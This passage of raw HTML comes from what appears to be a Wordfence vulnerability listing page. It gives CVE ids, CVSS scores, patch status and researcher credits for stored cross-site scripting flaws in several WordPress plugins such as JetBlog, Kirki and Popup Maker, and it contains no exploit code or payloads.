<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63904d54-1fb4-45f6-ac42-d82fe192cf1b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d86382a-09b9-492a-bdf0-67a199c37d3a" target="_blank" rel="noopener">JetBlog &lt;= 2.4.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66572" target="_blank" rel="noopener noreferrer">							CVE-2026-66572						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blog" target="_blank" rel="noopener">JetBlog</a> <span class="wfvr-software-slug">[jet-blog]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d86382a-09b9-492a-bdf0-67a199c37d3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6566f610-1c5c-4198-ae25-e4651ee62952" target="_blank" rel="noopener">JetElements &lt;= 2.9.2.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66579" target="_blank" rel="noopener noreferrer">							CVE-2026-66579						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-elements" target="_blank" rel="noopener">JetElements</a> <span class="wfvr-software-slug">[jet-elements]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6566f610-1c5c-4198-ae25-e4651ee62952" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43a33302-6b32-43ab-a771-37e07784f56c" target="_blank" rel="noopener">JetSearch &lt;= 3.6.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66577" target="_blank" rel="noopener noreferrer">							CVE-2026-66577						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">JetSearch</a> <span class="wfvr-software-slug">[jet-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43a33302-6b32-43ab-a771-37e07784f56c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6e3d724-3296-4975-8191-ee41effb7a87" target="_blank" rel="noopener">JetTabs &lt;= 2.3.3.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66573" target="_blank" rel="noopener noreferrer">							CVE-2026-66573						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-tabs" target="_blank" rel="noopener">JetTabs</a> <span class="wfvr-software-slug">[jet-tabs]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6e3d724-3296-4975-8191-ee41effb7a87" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2c7868c4-d9ea-4f8f-a4ba-a9e7ca43ab1f" target="_blank" rel="noopener">Job Postings &lt;= 2.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;position_button&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18063" target="_blank" rel="noopener noreferrer">							CVE-2026-18063						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/job-postings" target="_blank" rel="noopener">Job Postings</a> <span class="wfvr-software-slug">[job-postings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2c7868c4-d9ea-4f8f-a4ba-a9e7ca43ab1f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b3b12d-273f-4402-a972-5380ec4e661c" target="_blank" rel="noopener">King Addons for Elementor &lt;= 51.1.80 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84902" target="_blank" rel="noopener noreferrer">							CVE-2026-84902						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/king-addons" target="_blank" rel="noopener">King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder</a> <span class="wfvr-software-slug">[king-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b3b12d-273f-4402-a972-5380ec4e661c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1954372-ea9b-44c0-b84b-5fa49efc9fb4" target="_blank" rel="noopener">Kirki 6.0.0 &#8211; 6.3.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84223" target="_blank" rel="noopener noreferrer">							CVE-2026-84223						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1954372-ea9b-44c0-b84b-5fa49efc9fb4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89392f97-58c5-48db-b835-013ef493ca5e" target="_blank" rel="noopener">Kubio AI Page Builder &lt;= 2.8.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via kubio/copyright Block Content</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14472" target="_blank" rel="noopener noreferrer">							CVE-2026-14472						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio" target="_blank" rel="noopener">Kubio AI Page Builder</a> <span class="wfvr-software-slug">[kubio]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89392f97-58c5-48db-b835-013ef493ca5e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34e0862d-55d3-4bc7-ba26-309ef1567e2b" target="_blank" rel="noopener">Magazine Blocks &lt;= 1.8.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;clientId&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75016" target="_blank" rel="noopener noreferrer">							CVE-2026-75016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/magazine-blocks" target="_blank" rel="noopener">Magazine Blocks – Blog Designer, Magazine &amp; Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid</a> <span class="wfvr-software-slug">[magazine-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34e0862d-55d3-4bc7-ba26-309ef1567e2b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e49f2068-5bc0-44f7-983c-82917addd904" target="_blank" rel="noopener">Master Slider &lt;= 3.11.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14844" target="_blank" rel="noopener noreferrer">							CVE-2026-14844						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-slider" target="_blank" rel="noopener">Master Slider – Responsive Touch Slider</a> <span class="wfvr-software-slug">[master-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e49f2068-5bc0-44f7-983c-82917addd904" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0238c125-7b1e-4f01-a991-4583e872e3ff" target="_blank" rel="noopener">Photo Gallery by 10Web – Mobile-Friendly Image Gallery &lt;= 1.8.44 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86311" target="_blank" rel="noopener noreferrer">							CVE-2026-86311						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery" target="_blank" rel="noopener">Photo Gallery by 10Web – Mobile-Friendly Image Gallery</a> <span class="wfvr-software-slug">[photo-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxnx" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5654f29de740409684396c829b955ab6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5654f29de740409684396c829b955ab6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxnx" target="_blank" rel="noopener">VuxNx</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0238c125-7b1e-4f01-a991-4583e872e3ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/973b23c6-4edd-4f89-b5cf-68e83cfdb8ac" target="_blank" rel="noopener">Popup Maker &lt;= 1.24.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via post_title</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15797" target="_blank" rel="noopener noreferrer">							CVE-2026-15797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-maker" target="_blank" rel="noopener">Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popup Builder</a> <span class="wfvr-software-slug">[popup-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/973b23c6-4edd-4f89-b5cf-68e83cfdb8ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48cfe124-34dd-4183-abe1-e345c5a9c31f" target="_blank" rel="noopener">Property Hive &lt;= 2.2.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66578" target="_blank" rel="noopener noreferrer">							CVE-2026-66578						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive" target="_blank" rel="noopener">Property Hive</a> <span class="wfvr-software-slug">[propertyhive]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48cfe124-34dd-4183-abe1-e345c5a9c31f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6df3abe-ef27-46d7-bbdd-abd994fce132" target="_blank" rel="noopener">Real 3D Flipbook &lt;= 5.1.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;lightboxtext&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15098" target="_blank" rel="noopener noreferrer">							CVE-2026-15098						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real3d-flipbook-lite" target="_blank" rel="noopener">Real3D Flipbook – 3D FlipBook, PDF FlipBook, PDF Viewer, PDF Embedder</a> <span class="wfvr-software-slug">[real3d-flipbook-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
